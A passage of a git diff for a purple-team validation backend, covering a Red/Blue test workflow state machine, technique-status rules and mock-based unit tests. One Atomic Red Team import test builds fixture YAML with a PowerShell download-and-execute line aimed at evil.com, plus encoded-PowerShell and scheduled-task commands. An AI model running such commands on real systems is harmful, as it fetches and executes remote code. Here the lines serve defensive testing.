total_tests=%d", + created, skipped, yaml_files_count, len(parsed_tests), + ) + + # Audit log (system action) + log_action( + db, + user_id=None, + action="import_atomic_red_team", + entity_type="test_template", + entity_id=None, + details=summary, + ) + + return summary diff --git a/backend/app/services/status_service.py b/backend/app/services/status_service.py index 82f0fb1..50962c2 100644 --- a/backend/app/services/status_service.py +++ b/backend/app/services/status_service.py @@ -1,36 +1,46 @@ """Service for recalculating the global status of a Technique -based on the state and result of its associated tests.""" +based on the state and result of its associated tests. + +V2 rules account for dual Red/Blue validation and use +``detection_result`` (filled by Blue Team) instead of the legacy +``result`` field. +""" from sqlalchemy.orm import Session -from app.models.enums import TechniqueStatus +from app.models.enums import TechniqueStatus, TestState from app.models.technique import Technique def recalculate_technique_status(db: Session, technique: Technique) -> None: """Recompute ``technique.status_global`` from its tests and commit. - Rules - ----- - - No tests → ``not_evaluated`` - - Any test not yet ``validated`` → ``in_progress`` - - All validated and all ``detected`` → ``validated`` - - All validated and any ``partially_detected`` → ``partial`` - - Otherwise → ``not_covered`` + Rules (v2) + ---------- + 1. No tests → ``not_evaluated`` + 2. All tests ``validated`` → look at detection results: + - All ``detected`` → ``validated`` + - Any ``partially_detected`` → ``partial`` + - Otherwise → ``not_covered`` + 3. Some tests ``validated``, others still in progress → ``partial`` + 4. All tests in intermediate states (no validated) → ``in_progress`` """ tests = technique.tests if not tests: technique.status_global = TechniqueStatus.not_evaluated - elif any(t.state != "validated" for t in tests): - technique.status_global = TechniqueStatus.in_progress - else: - results = [t.result for t in tests] - if all(r == "detected" for r in results): + elif all(t.state == TestState.validated for t in tests): + # All validated — inspect detection results + results = [t.detection_result for t in tests if t.detection_result] + if results and all(str(r) == "detected" or r == "detected" for r in results): technique.status_global = TechniqueStatus.validated - elif any(r == "partially_detected" for r in results): + elif any(str(r) == "partially_detected" or r == "partially_detected" for r in results): technique.status_global = TechniqueStatus.partial else: technique.status_global = TechniqueStatus.not_covered + elif any(t.state == TestState.validated for t in tests): + technique.status_global = TechniqueStatus.partial + else: + technique.status_global = TechniqueStatus.in_progress db.commit() diff --git a/backend/app/services/test_workflow_service.py b/backend/app/services/test_workflow_service.py new file mode 100644 index 0000000..dd30666 --- /dev/null +++ b/backend/app/services/test_workflow_service.py @@ -0,0 +1,285 @@ +"""Test workflow service — state-machine transitions for the Red/Blue validation flow. + +Controls which state transitions are valid and exposes high-level helpers +for each step in the test lifecycle: + + draft → red_executing → blue_evaluating → in_review → validated / rejected + ↓ + rejected → draft + +Every public function validates the transition, mutates the test, writes an +audit-log entry, and commits the session. +""" + +from datetime import datetime + +from fastapi import HTTPException, status +from sqlalchemy.orm import Session + +from app.models.enums import TestState +from app.models.test import Test +from app.models.user import User +from app.services.audit_service import log_action + +# --------------------------------------------------------------------------- +# Valid transition map +# --------------------------------------------------------------------------- + +VALID_TRANSITIONS: dict[TestState, list[TestState]] = { + TestState.draft: [TestState.red_executing], + TestState.red_executing: [TestState.blue_evaluating], + TestState.blue_evaluating: [TestState.in_review], + TestState.in_review: [TestState.validated, TestState.rejected], + TestState.rejected: [TestState.draft], + TestState.validated: [], # terminal state +} + + +# --------------------------------------------------------------------------- +# Core helpers +# --------------------------------------------------------------------------- + + +def can_transition(test: Test, target_state: TestState) -> bool: + """Return *True* if moving *test* to *target_state* is allowed.""" + current = test.state if isinstance(test.state, TestState) else TestState(test.state) + return target_state in VALID_TRANSITIONS.get(current, []) + + +def transition_state( + db: Session, + test: Test, + target_state: TestState, + user: User, + *, + action_name: str = "transition_state", + extra_details: dict | None = None, +) -> Test: + """Validate and perform a state transition, log it, and commit. + + Raises :class:`~fastapi.HTTPException` 400 when the transition is invalid. + """ + if not can_transition(test, target_state): + raise HTTPException( + status_code=status.HTTP_400_BAD_REQUEST, + detail=( + f"Invalid transition: cannot move from " + f"'{test.state.value if isinstance(test.state, TestState) else test.state}' " + f"to '{target_state.value}'" + ), + ) + + previous_state = test.state.value if isinstance(test.state, TestState) else test.state + test.state = target_state + db.flush() + + details: dict = { + "previous_state": previous_state, + "new_state": target_state.value, + "test_name": test.name, + "technique_id": str(test.technique_id), + } + if extra_details: + details.update(extra_details) + + log_action( + db, + user_id=user.id, + action=action_name, + entity_type="test", + entity_id=test.id, + details=details, + ) + + return test + + +# --------------------------------------------------------------------------- +# Lifecycle convenience functions +# --------------------------------------------------------------------------- + + +def start_execution(db: Session, test: Test, user: User) -> Test: + """Move from ``draft`` → ``red_executing``. + + Typically called by a **red_tech** when they begin the attack. + """ + test = transition_state( + db, test, TestState.red_executing, user, + action_name="start_execution", + ) + test.execution_date = datetime.utcnow() + db.commit() + return test + + +def submit_red_evidence(db: Session, test: Test, user: User) -> Test: + """Move from ``red_executing`` → ``blue_evaluating``. + + Called by **red_tech** once they have finished documenting the attack. + """ + test = transition_state( + db, test, TestState.blue_evaluating, user, + action_name="submit_red_evidence", + ) + db.commit() + return test + + +def submit_blue_evidence(db: Session, test: Test, user: User) -> Test: + """Move from ``blue_evaluating`` → ``in_review``. + + Called by **blue_tech** once they have finished documenting detection. + """ + test = transition_state( + db, test, TestState.in_review, user, + action_name="submit_blue_evidence", + ) + db.commit() + return test + + +def validate_as_red_lead( + db: Session, + test: Test, + user: User, + validation_status: str, + notes: str | None = None, +) -> Test: + """Record Red Lead's validation decision. + + *validation_status* must be ``"approved"`` or ``"rejected"``. + After recording the decision, :func:`check_dual_validation` is called + to potentially advance the test to ``validated`` or ``rejected``. + """ + if test.state not in (TestState.in_review,): + raise HTTPException( + status_code=status.HTTP_400_BAD_REQUEST, + detail=f"Cannot validate red side while test is in '{test.state.value if isinstance(test.state, TestState) else test.state}' state (must be in_review)", + ) + + if validation_status not in ("approved", "rejected"): + raise HTTPException( + status_code=status.HTTP_400_BAD_REQUEST, + detail="validation_status must be 'approved' or 'rejected'", + ) + + now = datetime.utcnow() + test.red_validation_status = validation_status + test.red_validated_by = user.id + test.red_validated_at = now + test.red_validation_notes = notes + + log_action( + db, + user_id=user.id, + action="validate_as_red_lead", + entity_type="test", + entity_id=test.id, + details={ + "validation_status": validation_status, + "notes": notes, + "technique_id": str(test.technique_id), + }, + ) + + check_dual_validation(db, test) + return test + + +def validate_as_blue_lead( + db: Session, + test: Test, + user: User, + validation_status: str, + notes: str | None = None, +) -> Test: + """Record Blue Lead's validation decision. + + *validation_status* must be ``"approved"`` or ``"rejected"``. + After recording the decision, :func:`check_dual_validation` is called + to potentially advance the test to ``validated`` or ``rejected``. + """ + if test.state not in (TestState.in_review,): + raise HTTPException( + status_code=status.HTTP_400_BAD_REQUEST, + detail=f"Cannot validate blue side while test is in '{test.state.value if isinstance(test.state, TestState) else test.state}' state (must be in_review)", + ) + + if validation_status not in ("approved", "rejected"): + raise HTTPException( + status_code=status.HTTP_400_BAD_REQUEST, + detail="validation_status must be 'approved' or 'rejected'", + ) + + now = datetime.utcnow() + test.blue_validation_status = validation_status + test.blue_validated_by = user.id + test.blue_validated_at = now + test.blue_validation_notes = notes + + log_action( + db, + user_id=user.id, + action="validate_as_blue_lead", + entity_type="test", + entity_id=test.id, + details={ + "validation_status": validation_status, + "notes": notes, + "technique_id": str(test.technique_id), + }, + ) + + check_dual_validation(db, test) + return test + + +def check_dual_validation(db: Session, test: Test) -> Test: + """Evaluate both leads' decisions and advance the test if both have voted. + + - Both **approved** → ``validated`` + - Either **rejected** → ``rejected`` + - Otherwise no state change (waiting for the other lead). + + Commits only when the state actually changes. + """ + red_status = test.red_validation_status + blue_status = test.blue_validation_status + + if red_status == "rejected" or blue_status == "rejected": + test.state = TestState.rejected + db.commit() + elif red_status == "approved" and blue_status == "approved": + test.state = TestState.validated + db.commit() + else: + # One side hasn't voted yet — stay in_review, just flush + db.commit() + + return test + + +def reopen_test(db: Session, test: Test, user: User) -> Test: + """Move a ``rejected`` test back to ``draft``, clearing validation fields. + + This allows the teams to redo the test cycle. + """ + test = transition_state( + db, test, TestState.draft, user, + action_name="reopen_test", + ) + + # Clear dual-validation fields + test.red_validation_status = None + test.red_validated_by = None + test.red_validated_at = None + test.red_validation_notes = None + + test.blue_validation_status = None + test.blue_validated_by = None + test.blue_validated_at = None + test.blue_validation_notes = None + + db.commit() + return test diff --git a/backend/requirements.txt b/backend/requirements.txt index 295facf..334f18f 100644 --- a/backend/requirements.txt +++ b/backend/requirements.txt @@ -9,6 +9,7 @@ bcrypt==4.0.1 boto3 apscheduler requests +pyyaml taxii2-client python-multipart pydantic-settings diff --git a/backend/tests/test_t106_workflow_service.py b/backend/tests/test_t106_workflow_service.py new file mode 100644 index 0000000..10e9749 --- /dev/null +++ b/backend/tests/test_t106_workflow_service.py @@ -0,0 +1,344 @@ +"""Validation tests for T-106: Test Workflow Service. + +Uses mock objects to avoid needing a running database. +The database module is stubbed before any app imports. +""" + +import sys +import os +import uuid +from unittest.mock import MagicMock, patch +from types import ModuleType +from datetime import datetime + +# --------------------------------------------------------------------------- +# 0. Stub heavy dependencies BEFORE importing any app modules +# --------------------------------------------------------------------------- + +# Ensure backend/ is on sys.path +backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..")) +if backend_dir not in sys.path: + sys.path.insert(0, backend_dir) + +# Stub pydantic_settings so config doesn't fail +if "pydantic_settings" not in sys.modules: + pydantic_settings_mock = ModuleType("pydantic_settings") + + class _BaseSettings: + def __init__(self, **kwargs): + pass + + def __init_subclass__(cls, **kwargs): + super().__init_subclass__(**kwargs) + + pydantic_settings_mock.BaseSettings = _BaseSettings + sys.modules["pydantic_settings"] = pydantic_settings_mock + +# Stub app.config +config_mod = ModuleType("app.config") + + +class _FakeSettings: + DATABASE_URL = "sqlite:///:memory:" + SECRET_KEY = "test" + ALGORITHM = "HS256" + ACCESS_TOKEN_EXPIRE_MINUTES = 60 + MINIO_ENDPOINT = "localhost:9000" + MINIO_ACCESS_KEY = "test" + MINIO_SECRET_KEY = "test" + MINIO_BUCKET = "test" + + +config_mod.settings = _FakeSettings() +sys.modules["app.config"] = config_mod + +# Stub app.database so no real engine is created +db_mod = ModuleType("app.database") +db_mod.Base = type("Base", (), {"metadata": MagicMock()}) +db_mod.get_db = MagicMock() +sys.modules["app.database"] = db_mod + +# Stub taxii2client +taxii_v20 = ModuleType("taxii2client.v20") +taxii_v20.Server = MagicMock +sys.modules["taxii2client"] = ModuleType("taxii2client") +sys.modules["taxii2client.v20"] = taxii_v20 + +# Stub jose +jose_mod = ModuleType("jose") +jose_mod.JWTError = Exception +jose_mod.jwt = MagicMock() +sys.modules["jose"] = jose_mod + +# Stub boto3 +boto3_mod = ModuleType("boto3") +boto3_mod.client = MagicMock() +sys.modules["boto3"] = boto3_mod +sys.modules["botocore"] = ModuleType("botocore") +sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions") +sys.modules["botocore.exceptions"].ClientError = Exception + +# Stub apscheduler +sys.modules["apscheduler"] = ModuleType("apscheduler") +sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers") +sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background") +sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock +sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers") +sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron") +sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock + +# --------------------------------------------------------------------------- +# Now we can safely import +# --------------------------------------------------------------------------- + +from app.models.enums import TestState +from app.services.test_workflow_service import ( + VALID_TRANSITIONS, + can_transition, + transition_state, + start_execution, + submit_red_evidence, + submit_blue_evidence, + validate_as_red_lead, + validate_as_blue_lead, + check_dual_validation, + reopen_test, +) + +# We also need HTTPException for assertions +from fastapi import HTTPException + +# --------------------------------------------------------------------------- +# Helpers +# --------------------------------------------------------------------------- + + +def _make_test(state: TestState = TestState.draft, **kwargs) -> MagicMock: + t = MagicMock() + t.id = uuid.uuid4() + t.name = "Mock Test" + t.technique_id = uuid.uuid4() + t.state = state + t.red_validation_status = kwargs.get("red_validation_status", None) + t.blue_validation_status = kwargs.get("blue_validation_status", None) + t.red_validated_by = None + t.red_validated_at = None + t.red_validation_notes = None + t.blue_validated_by = None + t.blue_validated_at = None + t.blue_validation_notes = None + t.execution_date = None + return t + + +def _make_user(role: str = "red_tech") -> MagicMock: + user = MagicMock() + user.id = uuid.uuid4() + user.role = role + return user + + +def _make_db() -> MagicMock: + return MagicMock() + + +# --------------------------------------------------------------------------- +# 1. draft -> red_executing works +# --------------------------------------------------------------------------- + + +@patch("app.services.test_workflow_service.log_action") +def test_draft_to_red_executing(mock_log): + test = _make_test(TestState.draft) + user = _make_user("red_tech") + db = _make_db() + + result = start_execution(db, test, user) + + assert result.state == TestState.red_executing + assert result.execution_date is not None + db.commit.assert_called() + mock_log.assert_called() + print(" [PASS] Transition draft -> red_executing works") + + +# --------------------------------------------------------------------------- +# 2. draft -> validated fails (not allowed) +# --------------------------------------------------------------------------- + + +@patch("app.services.test_workflow_service.log_action") +def test_draft_to_validated_fails(mock_log): + test = _make_test(TestState.draft) + user = _make_user("admin") + db = _make_db() + + try: + transition_state(db, test, TestState.validated, user) + assert False, "Should have raised HTTPException" + except HTTPException as exc: + assert exc.status_code == 400 + print(" [PASS] Transition draft -> validated correctly fails") + + +# --------------------------------------------------------------------------- +# 3. red_executing -> blue_evaluating works +# --------------------------------------------------------------------------- + + +@patch("app.services.test_workflow_service.log_action") +def test_red_executing_to_blue_evaluating(mock_log): + test = _make_test(TestState.red_executing) + user = _make_user("red_tech") + db = _make_db() + + result = submit_red_evidence(db, test, user) + + assert result.state == TestState.blue_evaluating + db.commit.assert_called() + mock_log.assert_called() + print(" [PASS] Transition red_executing -> blue_evaluating works") + + +# --------------------------------------------------------------------------- +# 4. check_dual_validation -> validated when both approved +# --------------------------------------------------------------------------- + + +@patch("app.services.test_workflow_service.log_action") +def test_dual_validation_both_approved(mock_log): + test = _make_test(TestState.in_review) + user_red = _make_user("red_lead") + user_blue = _make_user("blue_lead") + db = _make_db() + + validate_as_red_lead(db, test, user_red, "approved", "LGTM") + validate_as_blue_lead(db, test, user_blue, "approved", "Detection OK") + + assert test.state == TestState.validated + print(" [PASS] check_dual_validation -> validated when both approved") + + +# --------------------------------------------------------------------------- +# 5. check_dual_validation -> rejected when one rejects +# --------------------------------------------------------------------------- + + +@patch("app.services.test_workflow_service.log_action") +def test_dual_validation_one_rejected(mock_log): + test = _make_test(TestState.in_review) + user_red = _make_user("red_lead") + db = _make_db() + + validate_as_red_lead(db, test, user_red, "rejected", "Insufficient evidence") + + assert test.state == TestState.rejected + print(" [PASS] check_dual_validation -> rejected when one rejects") + + +# --------------------------------------------------------------------------- +# 6. reopen_test clears validation fields +# --------------------------------------------------------------------------- + + +@patch("app.services.test_workflow_service.log_action") +def test_reopen_clears_validation(mock_log): + test = _make_test( + TestState.rejected, + red_validation_status="rejected", + blue_validation_status="approved", + ) + user = _make_user("red_lead") + db = _make_db() + + result = reopen_test(db, test, user) + + assert result.state == TestState.draft + assert result.red_validation_status is None + assert result.blue_validation_status is None + assert result.red_validated_by is None + assert result.red_validated_at is None + assert result.red_validation_notes is None + assert result.blue_validated_by is None + assert result.blue_validated_at is None + assert result.blue_validation_notes is None + db.commit.assert_called() + print(" [PASS] reopen_test clears validation fields and moves to draft") + + +# --------------------------------------------------------------------------- +# 7. Every transition generates an audit log +# --------------------------------------------------------------------------- + + +@patch("app.services.test_workflow_service.log_action") +def test_transitions_generate_audit_logs(mock_log): + test = _make_test(TestState.draft) + user = _make_user("red_tech") + db = _make_db() + + start_execution(db, test, user) + assert mock_log.call_count >= 1 + c1 = mock_log.call_count + + submit_red_evidence(db, test, user) + assert mock_log.call_count > c1 + c2 = mock_log.call_count + + submit_blue_evidence(db, test, user) + assert mock_log.call_count > c2 + + print(" [PASS] Each transition generates an audit log") + + +# --------------------------------------------------------------------------- +# 8. can_transition correctness +# --------------------------------------------------------------------------- + + +def test_can_transition_map(): + test = _make_test(TestState.draft) + + assert can_transition(test, TestState.red_executing) is True + assert can_transition(test, TestState.validated) is False + assert can_transition(test, TestState.blue_evaluating) is False + + test.state = TestState.red_executing + assert can_transition(test, TestState.blue_evaluating) is True + assert can_transition(test, TestState.draft) is False + + test.state = TestState.blue_evaluating + assert can_transition(test, TestState.in_review) is True + + test.state = TestState.in_review + assert can_transition(test, TestState.validated) is True + assert can_transition(test, TestState.rejected) is True + assert can_transition(test, TestState.draft) is False + + test.state = TestState.rejected + assert can_transition(test, TestState.draft) is True + + test.state = TestState.validated + assert can_transition(test, TestState.draft) is False + assert can_transition(test, TestState.rejected) is False + + print(" [PASS] can_transition map is correct") + + +# --------------------------------------------------------------------------- +# Run all +# --------------------------------------------------------------------------- + +if __name__ == "__main__": + print("T-106 Validation: Test Workflow Service") + print("=" * 50) + test_draft_to_red_executing() + test_draft_to_validated_fails() + test_red_executing_to_blue_evaluating() + test_dual_validation_both_approved() + test_dual_validation_one_rejected() + test_reopen_clears_validation() + test_transitions_generate_audit_logs() + test_can_transition_map() + print("=" * 50) + print("ALL T-106 validations PASSED!") diff --git a/backend/tests/test_t107_status_service.py b/backend/tests/test_t107_status_service.py new file mode 100644 index 0000000..c588f7e --- /dev/null +++ b/backend/tests/test_t107_status_service.py @@ -0,0 +1,229 @@ +"""Validation tests for T-107: Updated status recalculation service. + +Verifies the new logic that considers dual validation and detection_result. +""" + +import sys +import os +import uuid +from unittest.mock import MagicMock +from types import ModuleType + +# --------------------------------------------------------------------------- +# Stub heavy dependencies +# --------------------------------------------------------------------------- + +backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..")) +if backend_dir not in sys.path: + sys.path.insert(0, backend_dir) + +# Only stub if not already stubbed (in case tests run together) +if "pydantic_settings" not in sys.modules: + pydantic_settings_mock = ModuleType("pydantic_settings") + + class _BaseSettings: + def __init__(self, **kwargs): + pass + def __init_subclass__(cls, **kwargs): + super().__init_subclass__(**kwargs) + + pydantic_settings_mock.BaseSettings = _BaseSettings + sys.modules["pydantic_settings"] = pydantic_settings_mock + +if "app.config" not in sys.modules: + config_mod = ModuleType("app.config") + + class _FakeSettings: + DATABASE_URL = "sqlite:///:memory:" + SECRET_KEY = "test" + ALGORITHM = "HS256" + ACCESS_TOKEN_EXPIRE_MINUTES = 60 + MINIO_ENDPOINT = "localhost:9000" + MINIO_ACCESS_KEY = "test" + MINIO_SECRET_KEY = "test" + MINIO_BUCKET = "test" + + config_mod.settings = _FakeSettings() + sys.modules["app.config"] = config_mod + +if "app.database" not in sys.modules: + db_mod = ModuleType("app.database") + db_mod.Base = type("Base", (), {"metadata": MagicMock()}) + db_mod.get_db = MagicMock() + sys.modules["app.database"] = db_mod + +if "taxii2client" not in sys.modules: + sys.modules["taxii2client"] = ModuleType("taxii2client") + taxii_v20 = ModuleType("taxii2client.v20") + taxii_v20.Server = MagicMock + sys.modules["taxii2client.v20"] = taxii_v20 + +if "jose" not in sys.modules: + jose_mod = ModuleType("jose") + jose_mod.JWTError = Exception + jose_mod.jwt = MagicMock() + sys.modules["jose"] = jose_mod + +if "boto3" not in sys.modules: + boto3_mod = ModuleType("boto3") + boto3_mod.client = MagicMock() + sys.modules["boto3"] = boto3_mod + sys.modules["botocore"] = ModuleType("botocore") + sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions") + sys.modules["botocore.exceptions"].ClientError = Exception + +if "apscheduler" not in sys.modules: + sys.modules["apscheduler"] = ModuleType("apscheduler") + sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers") + sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background") + sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock + sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers") + sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron") + sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock + +# --------------------------------------------------------------------------- +# Imports +# --------------------------------------------------------------------------- + +from app.models.enums import TechniqueStatus, TestState, TestResult +from app.services.status_service import recalculate_technique_status + +# --------------------------------------------------------------------------- +# Helpers +# --------------------------------------------------------------------------- + + +def _make_test_obj(state, detection_result=None): + """Create a mock test with the given state and detection_result.""" + t = MagicMock() + t.state = state + t.detection_result = detection_result + return t + + +def _make_technique(tests=None): + """Create a mock technique.""" + technique = MagicMock() + technique.tests = tests or [] + technique.status_global = None + return technique + + +def _make_db(): + return MagicMock() + + +# --------------------------------------------------------------------------- +# 1. Sin tests -> not_evaluated +# --------------------------------------------------------------------------- + + +def test_no_tests(): + technique = _make_technique([]) + db = _make_db() + recalculate_technique_status(db, technique) + assert technique.status_global == TechniqueStatus.not_evaluated + db.commit.assert_called() + print(" [PASS] No tests -> not_evaluated") + + +# --------------------------------------------------------------------------- +# 2. Todos validated con detection=detected -> validated +# --------------------------------------------------------------------------- + + +def test_all_validated_all_detected(): + tests = [ + _make_test_obj(TestState.validated, TestResult.detected), + _make_test_obj(TestState.validated, TestResult.detected), + ] + technique = _make_technique(tests) + db = _make_db() + recalculate_technique_status(db, technique) + assert technique.status_global == TechniqueStatus.validated + print(" [PASS] All validated, all detected -> validated") + + +# --------------------------------------------------------------------------- +# 3. Algunos validated, otros en progreso -> partial +# --------------------------------------------------------------------------- + + +def test_some_validated_some_in_progress(): + tests = [ + _make_test_obj(TestState.validated, TestResult.detected), + _make_test_obj(TestState.red_executing, None), + ] + technique = _make_technique(tests) + db = _make_db() + recalculate_technique_status(db, technique) + assert technique.status_global == TechniqueStatus.partial + print(" [PASS] Some validated, some in progress -> partial") + + +# --------------------------------------------------------------------------- +# 4. Todos en estados intermedios -> in_progress +# --------------------------------------------------------------------------- + + +def test_all_intermediate(): + tests = [ + _make_test_obj(TestState.red_executing, None), + _make_test_obj(TestState.blue_evaluating, None), + ] + technique = _make_technique(tests) + db = _make_db() + recalculate_technique_status(db, technique) + assert technique.status_global == TechniqueStatus.in_progress + print(" [PASS] All intermediate -> in_progress") + + +# --------------------------------------------------------------------------- +# 5. Todos validated con detection=not_detected -> not_covered +# --------------------------------------------------------------------------- + + +def test_all_validated_not_detected(): + tests = [ + _make_test_obj(TestState.validated, TestResult.not_detected), + _make_test_obj(TestState.validated, TestResult.not_detected), + ] + technique = _make_technique(tests) + db = _make_db() + recalculate_technique_status(db, technique) + assert technique.status_global == TechniqueStatus.not_covered + print(" [PASS] All validated, not_detected -> not_covered") + + +# --------------------------------------------------------------------------- +# Bonus: All validated with partially_detected -> partial +# --------------------------------------------------------------------------- + + +def test_all_validated_partially_detected(): + tests = [ + _make_test_obj(TestState.validated, TestResult.detected), + _make_test_obj(TestState.validated, TestResult.partially_detected), + ] + technique = _make_technique(tests) + db = _make_db() + recalculate_technique_status(db, technique) + assert technique.status_global == TechniqueStatus.partial + print(" [PASS] All validated, partially_detected -> partial") + + +# --------------------------------------------------------------------------- +# Run all +# --------------------------------------------------------------------------- + +if __name__ == "__main__": + print("T-107 Validation: Status Service Recalculation") + print("=" * 50) + test_no_tests() + test_all_validated_all_detected() + test_some_validated_some_in_progress() + test_all_intermediate() + test_all_validated_not_detected() + test_all_validated_partially_detected() + print("=" * 50) + print("ALL T-107 validations PASSED!") diff --git a/backend/tests/test_t108_atomic_import.py b/backend/tests/test_t108_atomic_import.py new file mode 100644 index 0000000..0c00a00 --- /dev/null +++ b/backend/tests/test_t108_atomic_import.py @@ -0,0 +1,355 @@ +"""Validation tests for T-108: Atomic Red Team Import Service. + +Tests the YAML parsing logic and deduplication using synthetic data. +The download test is marked as optional (requires network). +""" + +import sys +import os +import uuid +import tempfile +import shutil +from unittest.mock import MagicMock, patch, PropertyMock +from types import ModuleType +from pathlib import Path + +# --------------------------------------------------------------------------- +# Stub heavy dependencies +# --------------------------------------------------------------------------- + +backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..")) +if backend_dir not in sys.path: + sys.path.insert(0, backend_dir) + +if "pydantic_settings" not in sys.modules: + pydantic_settings_mock = ModuleType("pydantic_settings") + class _BaseSettings: + def __init__(self, **kwargs): pass + def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs) + pydantic_settings_mock.BaseSettings = _BaseSettings + sys.modules["pydantic_settings"] = pydantic_settings_mock + +if "app.config" not in sys.modules: + config_mod = ModuleType("app.config") + class _FakeSettings: + DATABASE_URL = "sqlite:///:memory:" + SECRET_KEY = "test" + ALGORITHM = "HS256" + ACCESS_TOKEN_EXPIRE_MINUTES = 60 + MINIO_ENDPOINT = "localhost:9000" + MINIO_ACCESS_KEY = "test" + MINIO_SECRET_KEY = "test" + MINIO_BUCKET = "test" + config_mod.settings = _FakeSettings() + sys.modules["app.config"] = config_mod + +if "app.database" not in sys.modules: + db_mod = ModuleType("app.database") + db_mod.Base = type("Base", (), {"metadata": MagicMock()}) + db_mod.get_db = MagicMock() + sys.modules["app.database"] = db_mod + +if "taxii2client" not in sys.modules: + sys.modules["taxii2client"] = ModuleType("taxii2client") + taxii_v20 = ModuleType("taxii2client.v20") + taxii_v20.Server = MagicMock + sys.modules["taxii2client.v20"] = taxii_v20 + +if "jose" not in sys.modules: + jose_mod = ModuleType("jose") + jose_mod.JWTError = Exception + jose_mod.jwt = MagicMock() + sys.modules["jose"] = jose_mod + +if "boto3" not in sys.modules: + boto3_mod = ModuleType("boto3") + boto3_mod.client = MagicMock() + sys.modules["boto3"] = boto3_mod + sys.modules["botocore"] = ModuleType("botocore") + sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions") + sys.modules["botocore.exceptions"].ClientError = Exception + +if "apscheduler" not in sys.modules: + sys.modules["apscheduler"] = ModuleType("apscheduler") + sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers") + sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background") + sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock + sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers") + sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron") + sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock + +# --------------------------------------------------------------------------- +# Imports +# --------------------------------------------------------------------------- + +import yaml +from app.services.atomic_import_service import ( + _parse_yaml_files, + _extract_zip, + import_atomic_red_team, + ATOMIC_RT_ZIP_URL, +) + +# --------------------------------------------------------------------------- +# Helpers — create a synthetic atomics directory +# --------------------------------------------------------------------------- + + +def _create_fake_atomics(tmp_dir: str, techniques: dict[str, list[dict]]) -> Path: + """Create a fake atomics/ directory with YAML files. + + Parameters + ---------- + techniques : dict + Mapping from technique ID (e.g. "T1059.001") to a list of test dicts. + """ + atomics = Path(tmp_dir) / "atomics" + atomics.mkdir(parents=True, exist_ok=True) + + for tech_id, tests in techniques.items(): + tech_dir = atomics / tech_id + tech_dir.mkdir(exist_ok=True) + yaml_data = { + "attack_technique": tech_id, + "display_name": f"Technique {tech_id}", + "atomic_tests": tests, + } + yaml_path = tech_dir / f"{tech_id}.yaml" + with open(yaml_path, "w", encoding="utf-8") as fh: + yaml.dump(yaml_data, fh) + + return atomics + + +# --------------------------------------------------------------------------- +# 1. Parsing creates correct TestTemplate-like dicts +# --------------------------------------------------------------------------- + + +def test_parse_creates_templates(): + tmp_dir = tempfile.mkdtemp(prefix="aegis_test_") + try: + atomics = _create_fake_atomics(tmp_dir, { + "T1059.001": [ + { + "name": "PowerShell Invoke-Expression", + "description": "Runs a PS command", + "supported_platforms": ["windows"], + "executor": { + "name": "powershell", + "command": "IEX (New-Object Net.WebClient).DownloadString('http://evil.com')", + }, + }, + { + "name": "PowerShell Base64 Encoded", + "description": "Runs base64-encoded PS", + "supported_platforms": ["windows"], + "executor": { + "name": "powershell", + "command": "powershell -enc ZQBjaA==", + }, + }, + ], + "T1053.005": [ + { + "name": "Scheduled Task Creation", + "description": "Creates a scheduled task", + "supported_platforms": ["windows", "linux"], + "executor": { + "name": "command_prompt", + "command": "schtasks /create /tn test /tr calc.exe", + }, + }, + ], + }) + results = _parse_yaml_files(atomics) + + assert len(results) == 3, f"Expected 3 tests, got {len(results)}" + + # Verify atomic_test_id format + ids = {r["atomic_test_id"] for r in results} + assert "T1059.001-0" in ids + assert "T1059.001-1" in ids + assert "T1053.005-0" in ids + + # Check source is "atomic_red_team" (via source_url) + for r in results: + assert "atomic-red-team" in r["source_url"] + + # Check platforms + for r in results: + if r["technique_id"] == "T1053.005": + assert "windows" in r["platforms"] + assert "linux" in r["platforms"] + + print(" [PASS] Parsing creates correct templates with source and valid data") + finally: + shutil.rmtree(tmp_dir, ignore_errors=True) + + +# --------------------------------------------------------------------------- +# 2. Running twice does not duplicate +# --------------------------------------------------------------------------- + + +@patch("app.services.atomic_import_service.TestTemplate") +@patch("app.services.atomic_import_service.log_action") +@patch("app.services.atomic_import_service._download_zip") +def test_no_duplicates(mock_download, mock_log, MockTestTemplate): + """Import twice with same data — second run should skip everything.""" + import io + import zipfile + + # Make TestTemplate() return a mock each time + MockTestTemplate.side_effect = lambda **kwargs: MagicMock(**kwargs) + # Keep atomic_test_id queryable + MockTestTemplate.atomic_test_id = MagicMock() + MockTestTemplate.atomic_test_id.isnot = MagicMock(return_value=True) + + # Build a fake ZIP + tmp_dir = tempfile.mkdtemp(prefix="aegis_test_zip_") + try: + atomics = _create_fake_atomics( + os.path.join(tmp_dir, "atomic-red-team-master"), + { + "T1059.001": [ + { + "name": "Test One", + "description": "Desc", + "supported_platforms": ["windows"], + "executor": {"name": "sh", "command": "echo test"}, + }, + ], + }, + ) + + # Create a ZIP from the tmp_dir + zip_buffer = io.BytesIO() + with zipfile.ZipFile(zip_buffer, "w") as zf: + root = Path(tmp_dir) + for file_path in root.rglob("*"): + if file_path.is_file(): + arcname = str(file_path.relative_to(root)) + 